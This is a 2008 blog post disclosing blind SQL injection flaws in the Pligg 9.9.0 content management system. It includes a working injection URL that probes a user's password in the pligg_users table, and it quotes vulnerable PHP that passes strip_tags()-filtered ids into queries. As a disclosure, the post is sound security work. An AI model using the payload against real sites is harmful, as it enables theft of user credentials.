Recent Posts
- Export Address Table Filtering (EMET v2)
- Time of check, time of use
- MalwareDomains.com Serving Malware
- Scary monsters (and super creeps)
- Happy exploit wednesday!
- All you can spray
- Update: PDF sploits in the wild
- PDF sploits in the wild
- Vuln: OpenSSL 'ssl3_get_key_exchange()' Use-After-F..
-
OpenSSL 'ssl3_get_key_exchange()' Use-After-Free Memory ..
- Vuln: Linux Kernel Controller Area Network Protocol..
-
Linux Kernel Controller Area Network Protocol Local Priv..
- Vuln: Wireshark 0.8.20 through 1.2.8 Multiple Vulne..
-
Wireshark 0.8.20 through 1.2.8 Multiple Vulnerabilities ..
Categories
Comments
- abhi:Hi, I go
- k`sOSe:sorry for that,
- ftk:can you reuploa
- Vincent:Yup, 403.
- DG:403 Forbidden f
- k`sOSe:yep, exactly. t
- Thierry :"assuming
- h4x0r:Yeahhh ! i,m w
- snip:All work and no
- testonly:hi, i tried thi
- k`sOSe:hello w0lf, tha
- w0lf:hello frist of
- k`sOSe:Hi send9, feel
- k`sOSe:heya snip, than
- send9:Nice. I don
- snip:Guido, questa m
- fXsTar:Infernet eXplod
- k`sOSe:yeah indeed, my
- nopper:w00ting club :)
- k`sOSe:well said patri
- k`sOSe:thx
- sweet :cool shit you g
- k`sOSe:Fossi in te ci
- devon:Appena fixano r
Pligg 9.9.0 SQL Injection Vulnerability
Posted on 2008-04-09 00:48:39 in PornoSecurity
Today i wanted to try the Pligg digg-like content management system, after playing with it for a while I found a vulnerability.
The pligg developers fail to sufficiently sanitize user-supplied data before using it in an SQL query making it possibile to inject extra SQL statements.
http://www.example.com/editlink.php?id=1+AND+((SELECT+user_pass+FROM+pligg_users+WHERE+user_login=0x676f64)+LIKE+0x25)+UNION+SELECT+10,2
To exploit this you need the id of a news you submitted(10 in the example) and an id of a news submitted by others(1 in the example), when the LIKE statement matches you get a "Not your link" error.
This is a tipical blind SQL-injection scenario.
UPDATE:
Trying to write a little patch for a friend of mine i found many other security-related problems in pligg. Many user-supplied variables are simply not checked or checked in the very wrong way.
- The first case, editlink.php:
if(isset($_GET['id'])){libs/link.php:
$theid = strip_tags($_GET['id']);
}
if(isset($_POST['id'])){
$theid = strip_tags($_POST['id']);
}
[...]
$link = $db->get_row("SELECT link_id, link_author FROM " . table_links .
" WHERE link_id=".$theid.";")
[...]
$linkres->id=$link_id = strip_tags($_POST['id']);
$linkres->read();
function read($usecache = TRUE) {
$id = $this->id;
$link = $db->get_row("SELECT " . table_links . ".* FROM " . table_links
. " WHERE link_id = $id");
}
-
Another one, vote.php:
$link->id=$_POST['id'];link/link.php:
$link->read_basic();
function read_basic() {
[...]
$id = $this->id;
$db->get_row("SELECT link_comments, link_author, link_status, link_randkey, link_category, link_date, link_votes, link_karma,link_published_date FROM " . table_links . " WHERE link_id = $id")
..and so on.
I really dunno why they insist to strip_tags instead of a simple intval() ;)